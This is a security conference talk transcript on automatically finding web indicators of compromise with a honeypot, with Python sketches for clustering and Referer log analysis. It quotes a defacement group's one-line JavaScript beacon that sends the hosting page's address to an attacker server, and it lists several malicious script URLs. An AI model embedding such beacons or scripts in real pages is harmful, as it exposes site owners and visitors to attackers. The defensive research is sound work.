Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

Dr.-Ing. Marco Balduzzi (with D. Balzarotti and O. Catakoglu @ WWW'16)

29th April 2016, RuhrSec, Bochum

Who am I?

Sr. Research Scientist @ Trend Micro

Forward-Looking Threat Research (FTR) team

M.Sc. + Ph.D.

UniBG + iSecLab@EURECOM

Hackish and open-source enthusiast since 2002

Established presence in international conferences and committees

Indicators of Compromise (IOCs)

Used in incident response and computer forensics

Forensic artifacts indicating that a system has been compromised or infected with malware

For example

Presence in Windows Registry

File with a known MD5 hash in a temporary directory

Unusual outbound network traffic

Log-in irregularities and failures

Topic of presentation

Extend the concept of IOCs to Web Applications

(& automatically detect them!)

A simple observation

When compromising a web application, attackers often rely on external content / accessory scripts

These scripts are not necessarily malicious per se

Popular JavaScript libraries, e.g. jQuery

Beautifiers that control the look and feel of the page, e.g. matrix-style background

Scripts that implement reusable functions, e.g. browser fingerprinting

Their innocuous form makes them “highly resilient” to traditional detection systems (scanners)

BUT…

Their presence can be used to precisely pinpoint compromised or harmful pages

(a Web Indicator of Compromise)

Example: r57 hacking group

...
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html;charset=windows-1252">
<title>4Ri3 60ndr0n9 was here </title>
<SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js></SCRIPT>
...

a=new/**/Image();a.src='http://www.r57.gen.tr/r00t/yaz.php?a='+ escape(location.href);
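
The one-liner above requests an image whose URL carries the address of the page that loaded it, so the receiving server learns where the script is running. A minimal Python sketch of that round trip follows. The victim URL is hypothetical, and `quote` with the safe set `@*_+-./` is only an approximation of JavaScript's `escape()` for ASCII input.

```python
from urllib.parse import parse_qs, quote, urlsplit

# Endpoint taken from the slide; everything else below is illustrative.
BEACON = "http://www.r57.gen.tr/r00t/yaz.php?a="


def beacon_url(page_url: str) -> str:
    # JavaScript's escape() leaves letters, digits and @*_+-./ untouched;
    # quote() with the same safe set approximates it for ASCII input.
    return BEACON + quote(page_url, safe="@*_+-./")


def reported_page(request_url: str) -> str:
    # Recover the page address from the query string, as the receiver could.
    return parse_qs(urlsplit(request_url).query)["a"][0]


url = beacon_url("http://victim.example/index.html")  # hypothetical defaced page
print(url)
print(reported_page(url))
```

Every page that includes the script therefore announces itself to the script's host.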

How do we know that a script is used in a malicious context?

i.e., that it “is a valid IOC”

Data Collection

High-interaction web honeypot [1]

[1] Canali, D., and Balzarotti, D. Behind the scenes of online attacks: an analysis of exploitation behaviors on the web.

Extraction of Candidates

Automatically extract candidates from files uploaded and modified by attackers

Focus on JavaScript URLs

Can be applied to other resource types

Normally benign!

E.g., a script that blocks the mouse right-click, used by attackers to prevent page inspection

Content agnostic: the script alone does not tell whether its use is malicious

Need to extend the analysis to the context
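
The extraction step can be sketched with Python's standard `html.parser`. This is an illustration under assumptions, not the framework used in the study: the class and function names are hypothetical, and the sample documents are made up around the r57 snippet shown earlier.

```python
from collections import Counter
from html.parser import HTMLParser


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        # Tag and attribute names arrive lowercased from HTMLParser.
        if tag == "script":
            src = dict(attrs).get("src")
            if src and src.lower().startswith(("http://", "https://", "//")):
                self.urls.append(src.strip())


def extract_candidates(documents):
    """Map each external script URL to the number of times it was seen."""
    counts = Counter()
    for html in documents:
        parser = ScriptSrcCollector()
        parser.feed(html)
        counts.update(parser.urls)
    return counts


# Hypothetical files uploaded to the honeypot.
uploaded = [
    "<head><title>4Ri3 60ndr0n9 was here </title>"
    "<SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js></SCRIPT></head>",
    '<script src="http://r57.gen.tr/yazciz/ciz.js"></script>'
    "<script>alert(1)</script>",
]
candidates = extract_candidates(uploaded)
print(len(candidates), "unique of", sum(candidates.values()), "total")
```

Inline scripts carry no URL and are skipped, which matches the content-agnostic design: only the reference is recorded, not what the script does.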

Searching the Web for Indicators

Public web pages including references to our indicators

Google did not help :(

Only indexes the visible page content (intext:), not the HTML/JS source

Meanpath.com

HTML/JS source-code support

Coverage of 200 million websites

Compromised vs. Benign

Verify that a candidate URL is a valid Indicator

Set of features:

Page Similarity

Maliciousness

Anomalous Origin

Component Popularity

Security Forums
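
The slides name the features without saying how each is computed. As one possible reading of Page Similarity, the sketch below scores how alike the pages that include a candidate URL are, using Jaccard similarity over word tokens. The metric, the function names and the sample pages are all assumptions made for illustration.

```python
import re


def tokens(html: str) -> set:
    # Strip tags crudely and keep lowercase word tokens.
    text = re.sub(r"<[^>]+>", " ", html)
    return set(re.findall(r"[a-z0-9]+", text.lower()))


def jaccard(a: str, b: str) -> float:
    ta, tb = tokens(a), tokens(b)
    if not ta and not tb:
        return 1.0
    return len(ta & tb) / len(ta | tb)


def mean_pairwise_similarity(pages) -> float:
    pairs = [(i, j) for i in range(len(pages)) for j in range(i + 1, len(pages))]
    if not pairs:
        return 0.0
    return sum(jaccard(pages[i], pages[j]) for i, j in pairs) / len(pairs)


# Hypothetical pages that all reference the same candidate script.
pages = [
    "<title>hacked by x</title>",
    "<h1>Hacked by X</h1>",
    "<p>welcome to our shop</p>",
]
print(mean_pairwise_similarity(pages))
```

A high score would suggest the script travels with one template, such as a defacement page, while a low score would suggest it is embedded in unrelated sites.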

Experiments

Training data: Jan 2015 → April 2015

375 unique candidates (over a total of 2,765)

Population of 1 to 202 (manual vs automated attacks)

Clustering: unsupervised learning (k-means)

Weka framework

3 cluster categories: malicious, benign, undecided

Live experiment: May 2015 → August 2015 (4 months)

Automated detection via analysis framework
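
The clustering step was run in Weka; the plain-Python k-means below is only a stand-in to show the idea with k = 3. The two-dimensional feature vectors, the initial centroids and the function names are hypothetical.

```python
import math


def closest(point, centroids):
    # Index of the centroid with the smallest Euclidean distance to point.
    return min(range(len(centroids)), key=lambda i: math.dist(point, centroids[i]))


def kmeans(points, initial_centroids, max_iter=100):
    centroids = [tuple(c) for c in initial_centroids]
    for _ in range(max_iter):
        labels = [closest(p, centroids) for p in points]
        updated = []
        for i, old in enumerate(centroids):
            members = [p for p, label in zip(points, labels) if label == i]
            if members:
                # New centroid is the per-dimension mean of the members.
                updated.append(tuple(sum(axis) / len(members) for axis in zip(*members)))
            else:
                updated.append(old)  # keep an empty cluster's centroid in place
        if updated == centroids:
            break
        centroids = updated
    # Labels are recomputed so they always match the returned centroids.
    return centroids, [closest(p, centroids) for p in points]


# Hypothetical (maliciousness, popularity) vectors for five candidates.
points = [(0.9, 0.1), (0.8, 0.2), (0.1, 0.9), (0.2, 0.8), (0.5, 0.5)]
initial = [(1.0, 0.0), (0.0, 1.0), (0.5, 0.5)]
centroids, labels = kmeans(points, initial)
print(labels)
```

Because k-means is unsupervised, the resulting clusters still have to be interpreted afterwards as malicious, benign or undecided.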

Live Experiment

303 unique candidates (2.5/day)

Automatically processed and assigned to the closest cluster

22 Benign indicators

96 Malicious indicators

90% were previously unknown or misclassified

A quarter of the IOCs implement visual effects: moving text, snow

185 insufficient information (rare scripts)
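
Assigning a new candidate to the closest cluster amounts to a nearest-centroid lookup. The sketch below assumes three already-trained centroids with made-up coordinates, then checks the figures on this slide. The 123-day span assumes the experiment covered the full calendar months of May to August 2015.

```python
import math

# Hypothetical centroids, e.g. (maliciousness score, component popularity).
CENTROIDS = {
    "malicious": (0.85, 0.15),
    "benign": (0.15, 0.85),
    "undecided": (0.50, 0.50),
}


def assign(features):
    # Name of the cluster whose centroid is nearest in Euclidean distance.
    return min(CENTROIDS, key=lambda name: math.dist(features, CENTROIDS[name]))


print(assign((0.70, 0.10)))
print(assign((0.20, 0.90)))
print(assign((0.45, 0.55)))

# Figures from the slide: the three groups add up to the 303 candidates.
counts = {"benign": 22, "malicious": 96, "undecided": 185}
total = sum(counts.values())
days = 31 + 30 + 31 + 31  # May to August, assumed to be full months
print(total, round(total / days, 1))
```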

High Lifetime of Malicious Indicators

Use of trustworthy code-repositories

10% of the IOCs were hosted on Google Drive/Code!

One was online for over 2 years!

Last month: used in dozens of defaced websites and drive-by downloads

Web Shells

Often deployed by attackers and hidden in defaced websites

Cases of password-protected logins [1]

Flagged as valid indicator

Cases of the r57shell script: feedback of defaced domains

[1] http://www.lionsclubmalviyanagar.com and http://www.wartisan.com

Phishing

Common habit

Webmail portals of AOL and Yahoo

Reused the original JS files and hosted on the authoritative domain [1]

IOC included in pages hosted on different domains

Websites compromised by the same group [2]

Correctly classified as malicious indicator

[1] http://sns-static.aolcdn.com/sns.v14r8/js/fs.js

[2] http://www.ucylojistik.com/ and http://fernandanunes.com/

VisAdd Adware Campaign

http://4x3zy4ql-l8bu4n1j.netdna-ssl.com/res/helper.min.js

Installed on defaced webpages

Traffic direction system (TDS) for affiliate programs

A.Visadd.com malware

Loads the same JS at client-side

600+ new infected users per day

Fake Charity Program

http://static.donation-tools.org/widgets/FoxyLyrics/widget.js

Loaded via a Browser Helper Object (BHO) in Internet Explorer

Vittalia and BrowseFox malware

594 new infections per day

Mailers

Compromised sites [1] → SPAM mailing server

Alternative to bulletproof hosting services (BHS) and botnet-infected machines

Use of Pro Mailer V2: PHP mailer

Copies of jQuery hosted on Google and Tumblr

Unmodified copies of popular libraries. Very likely classified as benign by traditional scanners

Malicious use detected.

[1] http://www.senzadistanza.it/ and http://www.hprgroup.biz/

Limitations

Our approach relies on the attacker's deployment strategy and is content agnostic

Evasion techniques:

Inline code

One-time generated URLs

Conclusions

Introduced the concept of Web IOCs

Leveraged a honeypot for real-time identification

Benign content → undetected by traditional scanners

Use 'HTTP Referer' to discover compromised pages

By the same hacking group?
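
The Referer idea can be sketched as follows, assuming access to the access log of the server that hosts an indicator (for example a code repository operator) and assuming the log is in Combined Log Format. The log lines, host names and function name are hypothetical.

```python
import re
from urllib.parse import urlsplit

# Combined Log Format: ... "METHOD path HTTP/x" status size "referer" "user-agent"
LINE = re.compile(r'"(?:GET|HEAD) (?P<path>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"')


def referring_hosts(log_lines, indicator_path):
    """Hosts whose pages caused a request for the indicator script."""
    hosts = set()
    for line in log_lines:
        m = LINE.search(line)
        if not m or m.group("path") != indicator_path:
            continue
        referer = m.group("referer")
        if referer in ("", "-"):
            continue  # the browser sent no Referer header
        host = urlsplit(referer).hostname
        if host:
            hosts.add(host)
    return hosts


# Hypothetical log excerpt.
log = [
    '203.0.113.5 - - [01/May/2015:10:00:00 +0000] "GET /yazciz/ciz.js HTTP/1.1" '
    '200 120 "http://victim-a.example/index.html" "Mozilla/5.0"',
    '203.0.113.9 - - [01/May/2015:10:05:00 +0000] "GET /yazciz/ciz.js HTTP/1.1" '
    '200 120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/May/2015:10:07:00 +0000] "GET /other.js HTTP/1.1" '
    '200 80 "http://unrelated.example/" "Mozilla/5.0"',
]
print(referring_hosts(log, "/yazciz/ciz.js"))
```

Each host returned is a page that loaded the indicator and is therefore a candidate compromised site worth reviewing.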

Thank you!

Dr.-Ing. Marco Balduzzi

@embyte